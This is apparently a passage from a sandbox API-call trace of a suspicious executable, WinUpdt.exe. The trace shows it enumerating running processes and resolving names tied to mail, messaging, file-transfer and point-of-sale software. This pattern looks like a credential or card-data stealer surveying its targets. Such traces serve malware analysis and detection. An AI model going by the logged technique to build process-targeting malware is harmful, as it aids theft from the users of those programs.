hProcess=0x1e4, lphModule=0x234575c, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x234575c, lpcbNeeded=0x39e760) returned 0 [0064.426] GetCurrentProcessId () returned 0x8e8 [0064.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.426] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.426] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.427] CloseHandle (hObject=0x1e0) returned 1 [0064.427] CloseHandle (hObject=0x1e4) returned 1 [0064.427] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9bc) returned 0x1e4 [0064.427] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23459ec, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23459ec, lpcbNeeded=0x39e760) returned 1 [0064.428] GetModuleInformation (in: hProcess=0x1e4, hModule=0x1120000, lpmodinfo=0x2345b2c, cb=0xc | out: lpmodinfo=0x2345b2c*(lpBaseOfDll=0x1120000, SizeOfImage=0x17000, EntryPoint=0x11214a1)) returned 1 [0064.429] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.429] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x1120000, lpBaseName=0x794888, nSize=0x800 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0064.429] CoTaskMemFree (pv=0x794888) [0064.429] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.429] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x1120000, lpFilename=0x794888, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Common Files\\spgagentservice.exe" (normalized: "c:\\program files (x86)\\common files\\spgagentservice.exe")) returned 0x37 [0064.429] CoTaskMemFree (pv=0x794888) [0064.429] CloseHandle (hObject=0x1e4) returned 1 [0064.429] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.429] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x1e4 [0064.430] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2347e30, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2347e30, lpcbNeeded=0x39e760) returned 0 [0064.430] GetCurrentProcessId () returned 0x8e8 [0064.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.430] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.430] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.431] CloseHandle (hObject=0x1e0) returned 1 [0064.431] CloseHandle (hObject=0x1e4) returned 1 [0064.431] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x82c) returned 0x1e4 [0064.431] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23480c0, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23480c0, lpcbNeeded=0x39e760) returned 1 [0064.432] GetModuleInformation (in: hProcess=0x1e4, hModule=0x11d0000, lpmodinfo=0x2348200, cb=0xc | out: lpmodinfo=0x2348200*(lpBaseOfDll=0x11d0000, SizeOfImage=0x17000, EntryPoint=0x11d14a1)) returned 1 [0064.432] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.432] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x11d0000, lpBaseName=0x794888, nSize=0x800 | out: lpBaseName="outlook.exe") returned 0xb [0064.433] CoTaskMemFree (pv=0x794888) [0064.433] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.433] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x11d0000, lpFilename=0x794888, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Defender\\outlook.exe" (normalized: "c:\\program files\\windows defender\\outlook.exe")) returned 0x2d [0064.433] CoTaskMemFree (pv=0x794888) [0064.433] CloseHandle (hObject=0x1e4) returned 1 [0064.433] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.433] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e4 [0064.433] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x234a4e0, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x234a4e0, lpcbNeeded=0x39e760) returned 0 [0064.433] GetCurrentProcessId () returned 0x8e8 [0064.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.433] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.433] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.434] CloseHandle (hObject=0x1e0) returned 1 [0064.434] CloseHandle (hObject=0x1e4) returned 1 [0064.435] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x1e4 [0064.435] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x234a770, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x234a770, lpcbNeeded=0x39e760) returned 1 [0064.436] GetModuleInformation (in: hProcess=0x1e4, hModule=0xfb0000, lpmodinfo=0x234a8b0, cb=0xc | out: lpmodinfo=0x234a8b0*(lpBaseOfDll=0xfb0000, SizeOfImage=0x17000, EntryPoint=0xfb14a1)) returned 1 [0064.436] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.436] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xfb0000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="active-charge.exe") returned 0x11 [0064.436] CoTaskMemFree (pv=0x7fa320) [0064.436] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.436] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xfb0000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files\\MSBuild\\active-charge.exe" (normalized: "c:\\program files\\msbuild\\active-charge.exe")) returned 0x2a [0064.436] CoTaskMemFree (pv=0x7fa320) [0064.437] CloseHandle (hObject=0x1e4) returned 1 [0064.437] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.437] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8bc) returned 0x1e4 [0064.437] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x234cb98, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x234cb98, lpcbNeeded=0x39e760) returned 1 [0064.438] GetModuleInformation (in: hProcess=0x1e4, hModule=0x2d0000, lpmodinfo=0x234ccd8, cb=0xc | out: lpmodinfo=0x234ccd8*(lpBaseOfDll=0x2d0000, SizeOfImage=0x17000, EntryPoint=0x2d14a1)) returned 1 [0064.438] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.438] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x2d0000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="whatsapp.exe") returned 0xc [0064.438] CoTaskMemFree (pv=0x7fa320) [0064.438] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.438] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x2d0000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Mail\\whatsapp.exe" (normalized: "c:\\program files\\windows mail\\whatsapp.exe")) returned 0x2a [0064.440] CoTaskMemFree (pv=0x7fa320) [0064.440] CloseHandle (hObject=0x1e4) returned 1 [0064.440] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.440] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e4 [0064.440] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x234efb8, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x234efb8, lpcbNeeded=0x39e760) returned 1 [0064.441] GetModuleInformation (in: hProcess=0x1e4, hModule=0xe90000, lpmodinfo=0x234f0f8, cb=0xc | out: lpmodinfo=0x234f0f8*(lpBaseOfDll=0xe90000, SizeOfImage=0x1a000, EntryPoint=0xea40fe)) returned 1 [0064.441] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.441] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xe90000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="WinUpdt.exe") returned 0xb [0064.442] CoTaskMemFree (pv=0x7fa320) [0064.442] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.442] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xe90000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WinUpdt.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\winupdt.exe")) returned 0x31 [0064.442] CoTaskMemFree (pv=0x7fa320) [0064.442] CloseHandle (hObject=0x1e4) returned 1 [0064.442] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.442] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ac) returned 0x1e4 [0064.442] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23513e0, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23513e0, lpcbNeeded=0x39e760) returned 1 [0064.443] GetModuleInformation (in: hProcess=0x1e4, hModule=0xb20000, lpmodinfo=0x2351520, cb=0xc | out: lpmodinfo=0x2351520*(lpBaseOfDll=0xb20000, SizeOfImage=0x17000, EntryPoint=0xb214a1)) returned 1 [0064.443] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.443] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xb20000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="spcwin.exe") returned 0xa [0064.444] CoTaskMemFree (pv=0x7fa320) [0064.444] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.444] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xb20000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Journal\\spcwin.exe" (normalized: "c:\\program files\\windows journal\\spcwin.exe")) returned 0x2b [0064.444] CoTaskMemFree (pv=0x7fa320) [0064.444] CloseHandle (hObject=0x1e4) returned 1 [0064.444] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.444] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x694) returned 0x1e4 [0064.444] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23537fc, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23537fc, lpcbNeeded=0x39e760) returned 1 [0064.445] GetModuleInformation (in: hProcess=0x1e4, hModule=0x1250000, lpmodinfo=0x235393c, cb=0xc | out: lpmodinfo=0x235393c*(lpBaseOfDll=0x1250000, SizeOfImage=0x17000, EntryPoint=0x12514a1)) returned 1 [0064.446] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.446] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x1250000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="barca.exe") returned 0x9 [0064.446] CoTaskMemFree (pv=0x7fa320) [0064.446] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.446] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x1250000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Portable Devices\\barca.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\barca.exe")) returned 0x39 [0064.446] CoTaskMemFree (pv=0x7fa320) [0064.446] CloseHandle (hObject=0x1e4) returned 1 [0064.446] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.446] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x1e4 [0064.447] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2355c30, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2355c30, lpcbNeeded=0x39e760) returned 0 [0064.447] GetCurrentProcessId () returned 0x8e8 [0064.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.447] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.447] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.448] CloseHandle (hObject=0x1e0) returned 1 [0064.448] CloseHandle (hObject=0x1e4) returned 1 [0064.448] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2355ec0, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2355ec0, lpcbNeeded=0x39e760) returned 1 [0064.449] GetModuleInformation (in: hProcess=0x1e4, hModule=0x60000, lpmodinfo=0x2356000, cb=0xc | out: lpmodinfo=0x2356000*(lpBaseOfDll=0x60000, SizeOfImage=0x17000, EntryPoint=0x614a1)) returned 1 [0064.450] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.450] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x60000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="operamail.exe") returned 0xd [0064.450] CoTaskMemFree (pv=0x7fa320) [0064.450] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.450] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x60000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Mail\\operamail.exe" (normalized: "c:\\program files (x86)\\windows mail\\operamail.exe")) returned 0x31 [0064.450] CoTaskMemFree (pv=0x7fa320) [0064.450] CloseHandle (hObject=0x1e4) returned 1 [0064.450] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.450] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23582ec, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23582ec, lpcbNeeded=0x39e760) returned 1 [0064.451] GetModuleInformation (in: hProcess=0x1e4, hModule=0x1310000, lpmodinfo=0x235842c, cb=0xc | out: lpmodinfo=0x235842c*(lpBaseOfDll=0x1310000, SizeOfImage=0x17000, EntryPoint=0x13114a1)) returned 1 [0064.452] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.452] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x1310000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="bitkinex.exe") returned 0xc [0064.452] CoTaskMemFree (pv=0x7fa320) [0064.452] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.452] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x1310000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Uninstall Information\\bitkinex.exe" (normalized: "c:\\program files (x86)\\uninstall information\\bitkinex.exe")) returned 0x39 [0064.452] CoTaskMemFree (pv=0x7fa320) [0064.452] CloseHandle (hObject=0x1e4) returned 1 [0064.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.452] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x235a728, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x235a728, lpcbNeeded=0x39e760) returned 1 [0064.453] GetModuleInformation (in: hProcess=0x1e4, hModule=0x1380000, lpmodinfo=0x235a868, cb=0xc | out: lpmodinfo=0x235a868*(lpBaseOfDll=0x1380000, SizeOfImage=0x17000, EntryPoint=0x13814a1)) returned 1 [0064.454] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.454] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x1380000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0064.454] CoTaskMemFree (pv=0x7fa320) [0064.454] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.454] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x1380000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\yahoomessenger.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\yahoomessenger.exe")) returned 0x43 [0064.454] CoTaskMemFree (pv=0x7fa320) [0064.454] CloseHandle (hObject=0x1e4) returned 1 [0064.454] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.454] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x235cb84, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x235cb84, lpcbNeeded=0x39e760) returned 1 [0064.455] GetModuleInformation (in: hProcess=0x1e4, hModule=0xaa0000, lpmodinfo=0x235ccc4, cb=0xc | out: lpmodinfo=0x235ccc4*(lpBaseOfDll=0xaa0000, SizeOfImage=0x17000, EntryPoint=0xaa14a1)) returned 1 [0064.456] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.456] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xaa0000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0064.456] CoTaskMemFree (pv=0x7fa320) [0064.456] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.456] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xaa0000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Portable Devices\\absolutetelnet.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\absolutetelnet.exe")) returned 0x42 [0064.456] CoTaskMemFree (pv=0x7fa320) [0064.456] CloseHandle (hObject=0x1e4) returned 1 [0064.456] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.456] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x235efe0, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x235efe0, lpcbNeeded=0x39e760) returned 0 [0064.457] CloseHandle (hObject=0x1e0) returned 1 [0064.457] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x235f270, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x235f270, lpcbNeeded=0x39e760) returned 1 [0064.458] GetModuleInformation (in: hProcess=0x1e4, hModule=0x2d0000, lpmodinfo=0x235f3b0, cb=0xc | out: lpmodinfo=0x235f3b0*(lpBaseOfDll=0x2d0000, SizeOfImage=0x17000, EntryPoint=0x2d14a1)) returned 1 [0064.459] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.459] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x2d0000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="omnipos.exe") returned 0xb [0064.459] CoTaskMemFree (pv=0x7fa320) [0064.459] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.459] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x2d0000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files\\DVD Maker\\omnipos.exe" (normalized: "c:\\program files\\dvd maker\\omnipos.exe")) returned 0x26 [0064.459] CoTaskMemFree (pv=0x7fa320) [0064.459] CloseHandle (hObject=0x1e4) returned 1 [0064.459] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.459] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2361684, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2361684, lpcbNeeded=0x39e760) returned 0 [0064.460] CloseHandle (hObject=0x1e0) returned 1 [0064.461] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2361914, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2361914, lpcbNeeded=0x39e760) returned 0 [0064.461] CloseHandle (hObject=0x1e0) returned 1 [0064.462] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2361ba4, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2361ba4, lpcbNeeded=0x39e760) returned 1 [0064.463] GetModuleInformation (in: hProcess=0x1e4, hModule=0x50000, lpmodinfo=0x2361ce4, cb=0xc | out: lpmodinfo=0x2361ce4*(lpBaseOfDll=0x50000, SizeOfImage=0x17000, EntryPoint=0x514a1)) returned 1 [0064.463] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.463] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x50000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="notepad.exe") returned 0xb [0064.463] CoTaskMemFree (pv=0x7fa320) [0064.463] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.463] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x50000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Adobe\\notepad.exe" (normalized: "c:\\program files (x86)\\adobe\\notepad.exe")) returned 0x28 [0064.464] CoTaskMemFree (pv=0x7fa320) [0064.464] CloseHandle (hObject=0x1e4) returned 1 [0064.464] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.464] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2363fbc, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2363fbc, lpcbNeeded=0x39e760) returned 0 [0064.465] CloseHandle (hObject=0x1e0) returned 1 [0064.465] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x236424c, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x236424c, lpcbNeeded=0x39e760) returned 0 [0064.466] CloseHandle (hObject=0x1e0) returned 1 [0064.466] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23644dc, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23644dc, lpcbNeeded=0x39e760) returned 1 [0064.467] GetModuleInformation (in: hProcess=0x1e4, hModule=0x70000, lpmodinfo=0x236461c, cb=0xc | out: lpmodinfo=0x236461c*(lpBaseOfDll=0x70000, SizeOfImage=0x17000, EntryPoint=0x714a1)) returned 1 [0064.467] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.467] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x70000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="winscp.exe") returned 0xa [0064.467] CoTaskMemFree (pv=0x7fa320) [0064.467] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.467] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x70000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Media Player\\winscp.exe" (normalized: "c:\\program files\\windows media player\\winscp.exe")) returned 0x30 [0064.468] CoTaskMemFree (pv=0x7fa320) [0064.468] CloseHandle (hObject=0x1e4) returned 1 [0064.468] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.468] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2366904, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2366904, lpcbNeeded=0x39e760) returned 1 [0064.469] GetModuleInformation (in: hProcess=0x1e4, hModule=0xe30000, lpmodinfo=0x2366a44, cb=0xc | out: lpmodinfo=0x2366a44*(lpBaseOfDll=0xe30000, SizeOfImage=0x17000, EntryPoint=0xe314a1)) returned 1 [0064.469] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.469] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xe30000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="fling.exe") returned 0x9 [0064.469] CoTaskMemFree (pv=0x7fa320) [0064.469] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.469] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xe30000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files\\Reference Assemblies\\fling.exe" (normalized: "c:\\program files\\reference assemblies\\fling.exe")) returned 0x2f [0064.470] CoTaskMemFree (pv=0x7fa320) [0064.470] CloseHandle (hObject=0x1e4) returned 1 [0064.470] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.470] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2368d24, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2368d24, lpcbNeeded=0x39e760) returned 0 [0064.471] CloseHandle (hObject=0x1e0) returned 1 [0064.471] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2368fb4, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2368fb4, lpcbNeeded=0x39e760) returned 1 [0064.472] GetModuleInformation (in: hProcess=0x1e4, hModule=0x1010000, lpmodinfo=0x23690f4, cb=0xc | out: lpmodinfo=0x23690f4*(lpBaseOfDll=0x1010000, SizeOfImage=0x17000, EntryPoint=0x10114a1)) returned 1 [0064.472] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.472] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x1010000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0064.472] CoTaskMemFree (pv=0x7fa320) [0064.473] CoTaskMemAlloc (cb=0x804) returned 